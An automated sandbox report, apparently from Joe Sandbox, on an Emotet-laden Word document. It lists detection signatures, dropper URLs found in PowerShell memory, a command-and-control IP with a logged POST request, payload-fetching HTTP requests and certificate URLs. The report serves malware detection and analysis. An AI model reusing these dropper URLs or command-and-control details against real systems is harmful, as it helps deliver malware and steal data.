Analysis Report N00048481397007.doc

Overview

General Information

Sample Name: N00048481397007.doc
Analysis ID: 343979
MD5: ad7db0f946bc5c3bb051cb04f359e6a4
SHA1: 24d54a6a1c4280b948fb245c97e4823d319eefe1
SHA256: 4fc6cbe4fae599ca6ab094dc1115909a687754f49a3ff31671ae4fbc7b3296d1

Most interesting Screenshot:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://nightlifemumbai.club/x/0wBD3/ Avira URL Cloud: Label: malware
Source: https://shop.nowfal.dev/wp-includes/RlMObf2j0/ Avira URL Cloud: Label: malware
Source: https://jflmktg.wpcomstaging.com/wp-content/AK/ Avira URL Cloud: Label: malware
Source: https://shop.nowfal.dev Avira URL Cloud: Label: malware
Machine Learning detection for dropped file
Source: C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll Joe Sandbox ML: detected

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown HTTPS traffic detected: 212.227.200.73:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown HTTPS traffic detected: 192.0.78.20:443 -> 192.168.2.22:49169 version: TLS 1.0
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2327249466.0000000002A60000.00000002.00000001.sdmp
Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: nightlifemumbai.club
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.21.88.166:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.217.6.174:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.22:49171 -> 190.55.186.229:80
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp String found in memory: http://nightlifemumbai.club/x/0wBD3/!https://shop.nowfal.dev/wp-includes/RlMObf2j0/!http://e-wdesign.eu/wp-content/bn1IgDejh/!http://traumfrauen-ukraine.de/bin/JyeS/!https://jflmktg.wpcomstaging.com/wp-content/AK/!https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp String found in memory: Ease of Access Centero<a href="http://go.microsoft.com/fwlink/?linkid=63345">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63353">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63363">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63367">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63370">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63373">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63376">Learn about additional assistive technologies online</a>PA!Make your computer easier to use.BGet recommendations to make your computer easier to use (eyesight)CGet recommendations to make your computer easier to use (dexterity)AGet recommendations to make your computer easier to use (hearing)
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp String found in memory: Get recommendations to make your computer easier to use (speech)CGet recommendations to make your computer easier to use (cognitive)"Use the computer without a display
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp String found in memory: normal/http://images.metaservices.microsoft.com/cover/6http://redir.metaservices.microsoft.com/redir/buynow/?1http://redir.metaservices.microsoft.com/dvdcover/PA6http://redir.metaservices.microsoft.com/redir/buynow/?,http://windowsmedia.com/redir/findmedia.asp?9http://redir.metaservices.microsoft.com/redir/getmdrdvd/?8http://redir.metaservices.microsoft.com/redir/getmdrcd/?Bhttp://redir.metaservices.microsoft.com/redir/getmdrcdbackground/??http://redir.metaservices.microsoft.com/redir/getmdrcdposturl/?Ihttp://redir.metaservices.microsoft.com/redir/getmdrcdposturlbackground/?=http://redir.metaservices.microsoft.com/redir/getdaiposturl/?:http://redir.metaservices.microsoft.com/redir/daifailure/?
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp String found in memory: Microsoft Corporation/(C) Microsoft Corporation. All rights reserved.9http://redir.metaservices.microsoft.com/redir/submittoc/?-http://windowsmedia.com/redir/QueryTOCExt.asp1res://wmploc.dll/Offline_MediaInfo_NowPlaying.htm7http://redir.metaservices.microsoft.com/redir/buynowmg/,http://windowsmedia.com/redir/buyticket9.asp)http://windowsmedia.com/redir/IDPPage.asp)http://windowsmedia.com/redir/IDPLogo.asp
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp String found in memory: AMG Rating: %s stars:http://redir.metaservices.microsoft.com/redir/mediaguide/?9http://redir.metaservices.microsoft.com/redir/radiotuner/,http://windowsmedia.com/redir/QueryTOCNP.asp#Show Video and Visualization Window9http://redir.metaservices.microsoft.com/redir/dvddetails/9http://redir.metaservices.microsoft.com/redir/dvdwizard/?PA
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp String found in memory: Do you want to switch to it now?
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp String found in memory: http://www.microsoft.com/windows/windowsmedia/musicservices.aspx?http://redir.metaservices.microsoft.com/redir/allservices/?sv=2?http://redir.metaservices.microsoft.com/redir/allservices/?sv=3?http://redir.metaservices.microsoft.com/redir/allservices/?sv=5PA
Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp String found in memory: Autoplay,http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=131536-http://go.microsoft.com/fwlink/?LinkId=131535+http://go.microsoft.com/fwlink/?LinkId=8430
Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp String found in memory: PRODUCT_KEY_PROBLEMS$ACTIVATION_TYPE_KEY_FIND_PRODUCT_KEY)ACTIVATION_TYPE_DIFF_KEY_FIND_PRODUCT_KEY+ACTIVATION_CHNG_TO_LICENSE_FIND_PRODUCT_KEYPA,ACTIVATION_PERIOD_EXPIRED_WHAT_IS_ACTIVATION-ACTIVATION_LICENSE_EXPIRED_WHAT_IS_ACTIVATION,ACTIVATION_LICENSE_EXPIRED_PRIVACY_STATEMENTPA,http://go.microsoft.com/fwlink/?LinkID=90983-http://go.microsoft.com/fwlink/?LinkId=123784PA$E77344FA-E978-464C-953E-EBA44F0522670ACTIVATION_ERROR_INSTALLING_REINSTALLING_WINDOWS$f3b8150b-0bd1-4fec-8283-7a1dd45c16377ACTIVATION_ERROR_REINSTALL_WINDOWS_CREATE_RESTORE_POINTPA-http://go.microsoft.com/fwlink/?LinkId=100109-http://go.microsoft.com/fwlink/?LinkId=100096-http://go.microsoft.com/fwlink/?LinkId=120830-http://go.microsoft.com/fwlink/?LinkId=120831,http://go.microsoft.com/fwlink/?LinkId=89429
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /x/0wBD3/ HTTP/1.1Host: nightlifemumbai.clubConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bin/JyeS/ HTTP/1.1Host: traumfrauen-ukraine.deConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 212.227.200.73 212.227.200.73
Source: Joe Sandbox View IP Address: 190.55.186.229 190.55.186.229
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: AUTOMATTICUS AUTOMATTICUS
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View ASN Name: GOOGLEUS GOOGLEUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /pvaadnb3/ HTTP/1.1DNT: 0Referer: 190.55.186.229/pvaadnb3/Content-Type: multipart/form-data; boundary=------------JavqSYlmrOTCUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.55.186.229Content-Length: 5508Connection: Keep-AliveCache-Control: no-cache
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown HTTPS traffic detected: 212.227.200.73:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown HTTPS traffic detected: 192.0.78.20:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24864F20-30CA-4646-ACFF-79FC9E14ADCB}.tmp
Source: global traffic HTTP traffic detected: GET /x/0wBD3/ HTTP/1.1Host: nightlifemumbai.clubConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bin/JyeS/ HTTP/1.1Host: traumfrauen-ukraine.deConnection: Keep-Alive
Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: nightlifemumbai.club
Source: unknown HTTP traffic detected: POST /pvaadnb3/ HTTP/1.1DNT: 0Referer: 190.55.186.229/pvaadnb3/Content-Type: multipart/form-data; boundary=------------JavqSYlmrOTCUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.55.186.229Content-Length: 5508Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1569Date: Mon, 25 Jan 2021 19:10:44 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: powershell.exe, 00000005.00000003.2325890478.000000001D051000.00000004.00000001.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
Source: powershell.exe, 00000005.00000003.2325890478.000000001D051000.00000004.00000001.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
Source: powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmp String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: powershell.exe, 00000005.00000002.2326597229.0000000001ECE000.00000004.00000001.sdmp String found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
Source: powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmp String found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/EncryptionEverywhereDVTLSCA-G1.crt0
Source: powershell.exe, 00000005.00000003.2326018353.000000001CFE9000.00000004.00000001.sdmp String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
Source: powershell.exe, 00000005.00000002.2334453493.000000001CFB8000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000005.00000002.2334750882.000000001D05F000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000005.00000002.2326644631.0000000001F69000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp String found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: powershell.exe, 00000005.00000002.2334526019.000000001CFE3000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmp String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: powershell.exe, 00000005.00000002.2334526019.000000001CFE3000.00000004.00000001.sdmp String found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0L
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: powershell.exe, 00000005.00000002.2326330204.00000000001B2000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabT6_v
Source: powershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmp String found in binary or memory: http://e-wdesign.eu
Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp String found in binary or memory: http://e-wdesign.eu/wp-content/bn1IgDejh/
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335520346.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331519355.0000000001FA7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2335196008.0000000001FA7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335520346.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331519355.0000000001FA7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2335196008.0000000001FA7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2331489213.0000000003B6A000.00000004.00000001.sdmp String found in binary or memory: http://nightlifemumbai.club
Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp String found in binary or memory: http://nightlifemumbai.club/x/0wBD3/
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0B
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0J
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
